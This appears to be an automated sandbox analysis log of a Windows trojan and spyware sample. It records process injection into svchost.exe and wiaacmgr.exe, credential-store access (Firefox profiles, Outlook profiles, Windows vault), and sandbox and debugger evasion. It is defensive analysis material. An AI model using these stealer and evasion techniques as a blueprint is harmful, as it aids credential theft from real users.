                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03387E54 appears 107 times
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeCode function: String function: 008FF9F2 appears 31 times
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeCode function: String function: 00900A30 appears 46 times
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: String function: 0471EA12 appears 86 times
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: String function: 046E5130 appears 58 times
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: String function: 0472F290 appears 103 times
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: String function: 0469B970 appears 262 times
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: String function: 046F7E54 appears 107 times
                Source: 3HnH4uJtE7.exe, 00000000.00000003.1741115369.0000000003553000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 3HnH4uJtE7.exe
                Source: 3HnH4uJtE7.exe, 00000000.00000003.1740885152.00000000036FD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 3HnH4uJtE7.exe
                Source: 3HnH4uJtE7.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/3@11/11
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeCode function: 0_2_009537B5 GetLastError,FormatMessageW,0_2_009537B5
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeCode function: 0_2_009410BF AdjustTokenPrivileges,CloseHandle,0_2_009410BF
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeCode function: 0_2_009416C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_009416C3
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeCode function: 0_2_009551CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_009551CD
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeCode function: 0_2_0096A67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_0096A67C
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeCode function: 0_2_0095648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,0_2_0095648E
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeCode function: 0_2_008E42A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_008E42A2
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeFile created: C:\Users\user\AppData\Local\Temp\aut9A1F.tmpJump to behavior
                Source: 3HnH4uJtE7.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: wiaacmgr.exe, 00000006.00000002.3560220883.00000000009E9000.00000004.00000020.00020000.00000000.sdmp, wiaacmgr.exe, 00000006.00000002.3560220883.0000000000A0B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: 3HnH4uJtE7.exeVirustotal: Detection: 69%
                Source: 3HnH4uJtE7.exeReversingLabs: Detection: 78%
                Source: unknownProcess created: C:\Users\user\Desktop\3HnH4uJtE7.exe "C:\Users\user\Desktop\3HnH4uJtE7.exe"
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\3HnH4uJtE7.exe"
                Source: C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exeProcess created: C:\Windows\SysWOW64\wiaacmgr.exe "C:\Windows\SysWOW64\wiaacmgr.exe"
                Source: C:\Windows\SysWOW64\wiaacmgr.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\3HnH4uJtE7.exe"Jump to behavior
                Source: C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exeProcess created: C:\Windows\SysWOW64\wiaacmgr.exe "C:\Windows\SysWOW64\wiaacmgr.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exeSection loaded: scansetting.dllJump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exeSection loaded: mfc42u.dllJump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exeSection loaded: msimg32.dllJump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: 3HnH4uJtE7.exeStatic file information: File size 1401344 > 1048576
                Source: 3HnH4uJtE7.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: 3HnH4uJtE7.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: 3HnH4uJtE7.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: 3HnH4uJtE7.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: 3HnH4uJtE7.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: 3HnH4uJtE7.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: 3HnH4uJtE7.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: wdFhguqpcrad.exe, 00000003.00000002.3560021834.00000000006DE000.00000002.00000001.01000000.00000005.sdmp, wdFhguqpcrad.exe, 00000007.00000002.3560022524.00000000006DE000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: 3HnH4uJtE7.exe, 00000000.00000003.1741115369.0000000003430000.00000004.00001000.00020000.00000000.sdmp, 3HnH4uJtE7.exe, 00000000.00000003.1742033212.0000000003620000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1963011131.0000000003300000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1866930699.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1868964920.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1963011131.000000000349E000.00000040.00001000.00020000.00000000.sdmp, wiaacmgr.exe, 00000006.00000002.3561222792.000000000480E000.00000040.00001000.00020000.00000000.sdmp, wiaacmgr.exe, 00000006.00000003.1962662464.000000000431B000.00000004.00000020.00020000.00000000.sdmp, wiaacmgr.exe, 00000006.00000003.1964647387.00000000044C4000.00000004.00000020.00020000.00000000.sdmp, wiaacmgr.exe, 00000006.00000002.3561222792.0000000004670000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: 3HnH4uJtE7.exe, 00000000.00000003.1741115369.0000000003430000.00000004.00001000.00020000.00000000.sdmp, 3HnH4uJtE7.exe, 00000000.00000003.1742033212.0000000003620000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.1963011131.0000000003300000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1866930699.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1868964920.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1963011131.000000000349E000.00000040.00001000.00020000.00000000.sdmp, wiaacmgr.exe, wiaacmgr.exe, 00000006.00000002.3561222792.000000000480E000.00000040.00001000.00020000.00000000.sdmp, wiaacmgr.exe, 00000006.00000003.1962662464.000000000431B000.00000004.00000020.00020000.00000000.sdmp, wiaacmgr.exe, 00000006.00000003.1964647387.00000000044C4000.00000004.00000020.00020000.00000000.sdmp, wiaacmgr.exe, 00000006.00000002.3561222792.0000000004670000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wiaacmgr.pdbGCTL source: svchost.exe, 00000001.00000003.1930867669.0000000000C1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1930942129.0000000000C2E000.00000004.00000020.00020000.00000000.sdmp, wdFhguqpcrad.exe, 00000003.00000002.3560592056.0000000001497000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wiaacmgr.pdb source: svchost.exe, 00000001.00000003.1930867669.0000000000C1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1930942129.0000000000C2E000.00000004.00000020.00020000.00000000.sdmp, wdFhguqpcrad.exe, 00000003.00000002.3560592056.0000000001497000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: wiaacmgr.exe, 00000006.00000002.3561555104.0000000004C9C000.00000004.10000000.00040000.00000000.sdmp, wiaacmgr.exe, 00000006.00000002.3560220883.000000000098F000.00000004.00000020.00020000.00000000.sdmp, wdFhguqpcrad.exe, 00000007.00000000.2028220729.000000000323C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2247814449.00000000170EC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: wiaacmgr.exe, 00000006.00000002.3561555104.0000000004C9C000.00000004.10000000.00040000.00000000.sdmp, wiaacmgr.exe, 00000006.00000002.3560220883.000000000098F000.00000004.00000020.00020000.00000000.sdmp, wdFhguqpcrad.exe, 00000007.00000000.2028220729.000000000323C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2247814449.00000000170EC000.00000004.80000000.00040000.00000000.sdmp
                Source: 3HnH4uJtE7.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: 3HnH4uJtE7.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: 3HnH4uJtE7.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: 3HnH4uJtE7.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: 3HnH4uJtE7.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeCode function: 0_2_008E42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_008E42DE
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeCode function: 0_2_00900A76 push ecx; ret 0_2_00900A89
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041A07C push ecx; iretd 1_2_0041A07D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00407174 push ss; ret 1_2_00407192
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00405133 pushfd ; retf 1_2_00405135
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041A9F3 push edi; retf 1_2_0041A9FE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040AAE5 push es; ret 1_2_0040AAE8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00403290 push eax; ret 1_2_00403292
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040D3B2 pushad ; retf 1_2_0040D3B6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00417609 push eax; retf 1_2_0041760A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004127CA push ebx; iretd 1_2_004127CB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0330225F pushad ; ret 1_2_033027F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033027FA pushad ; ret 1_2_033027F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033309AD push ecx; mov dword ptr [esp], ecx1_2_033309B6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0330283D push eax; iretd 1_2_03302858
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_046727FA pushad ; ret 6_2_046727F9
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_0467225F pushad ; ret 6_2_046727F9
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_0467283D push eax; iretd 6_2_04672858
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_046A09AD push ecx; mov dword ptr [esp], ecx6_2_046A09B6
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_0467135F push eax; iretd 6_2_04671369
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_00694376 push eax; retf 6_2_00694377
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_0069288C push ebx; ret 6_2_0069288D
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_00696DE9 push ecx; iretd 6_2_00696DEA
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_00694E70 push ss; retn 6E14h6_2_00694F22
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_0068F537 push ebx; iretd 6_2_0068F538
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_00697760 push edi; retf 6_2_0069776B
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_0069775B push edi; retf 6_2_0069776B
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_00687852 push es; ret 6_2_00687855
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_00683EE1 push ss; ret 6_2_00683EFF
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_00681EA0 pushfd ; retf 6_2_00681EA2
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_0069BE95 pushad ; ret 6_2_0069BEAB
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_0456B5FD push esi; ret 6_2_0456B5FF
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeCode function: 0_2_008FF98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_008FF98E
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeCode function: 0_2_00971C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00971C41
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Found API chain indicative of sandbox detection
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleepgraph_0-98133
                Switches to a custom stack to bypass stack traces
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeAPI/Special instruction interceptor: Address: BE29DC
                Source: C:\Windows\SysWOW64\wiaacmgr.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
                Source: C:\Windows\SysWOW64\wiaacmgr.exeAPI/Special instruction interceptor: Address: 7FFE2220D7E4
                Source: C:\Windows\SysWOW64\wiaacmgr.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
                Source: C:\Windows\SysWOW64\wiaacmgr.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
                Source: C:\Windows\SysWOW64\wiaacmgr.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
                Source: C:\Windows\SysWOW64\wiaacmgr.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
                Source: C:\Windows\SysWOW64\wiaacmgr.exeAPI/Special instruction interceptor: Address: 7FFE22210154
                Source: C:\Windows\SysWOW64\wiaacmgr.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0337096E rdtsc 1_2_0337096E
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeAPI coverage: 3.9 %
                Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.6 %
                Source: C:\Windows\SysWOW64\wiaacmgr.exeAPI coverage: 2.6 %
                Source: C:\Windows\SysWOW64\wiaacmgr.exe TID: 6968Thread sleep count: 45 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exe TID: 6968Thread sleep time: -90000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe TID: 7144Thread sleep time: -65000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe TID: 7144Thread sleep time: -43500s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe TID: 7144Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\wiaacmgr.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeCode function: 0_2_0094DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_0094DBBE
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeCode function: 0_2_009568EE FindFirstFileW,FindClose,0_2_009568EE
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeCode function: 0_2_0095698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_0095698F
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeCode function: 0_2_0094D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0094D076
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeCode function: 0_2_0094D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0094D3A9
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeCode function: 0_2_00959642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00959642
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeCode function: 0_2_0095979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0095979D
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeCode function: 0_2_00959B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00959B2B
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeCode function: 0_2_00955C97 FindFirstFileW,FindNextFileW,FindClose,0_2_00955C97
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_0069C9D0 FindFirstFileW,FindNextFileW,FindClose,6_2_0069C9D0
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeCode function: 0_2_008E42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_008E42DE
                Source: wiaacmgr.exe, 00000006.00000002.3560220883.000000000098F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll\
                Source: wdFhguqpcrad.exe, 00000007.00000002.3560526004.0000000001310000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000008.00000002.2251604417.00000259570EC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0337096E rdtsc 1_2_0337096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00417BA3 LdrLoadDll,1_2_00417BA3
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeCode function: 0_2_0095EAA2 BlockInput,0_2_0095EAA2
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeCode function: 0_2_00912622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00912622
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeCode function: 0_2_008E42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_008E42DE
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeCode function: 0_2_00904CE8 mov eax, dword ptr fs:[00000030h]0_2_00904CE8
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeCode function: 0_2_00BE2CA8 mov eax, dword ptr fs:[00000030h]0_2_00BE2CA8
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeCode function: 0_2_00BE2C48 mov eax, dword ptr fs:[00000030h]0_2_00BE2C48
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeCode function: 0_2_00BE1638 mov eax, dword ptr fs:[00000030h]0_2_00BE1638
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0340634F mov eax, dword ptr fs:[00000030h]1_2_0340634F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0332C310 mov ecx, dword ptr fs:[00000030h]1_2_0332C310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03350310 mov ecx, dword ptr fs:[00000030h]1_2_03350310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336A30B mov eax, dword ptr fs:[00000030h]1_2_0336A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336A30B mov eax, dword ptr fs:[00000030h]1_2_0336A30B
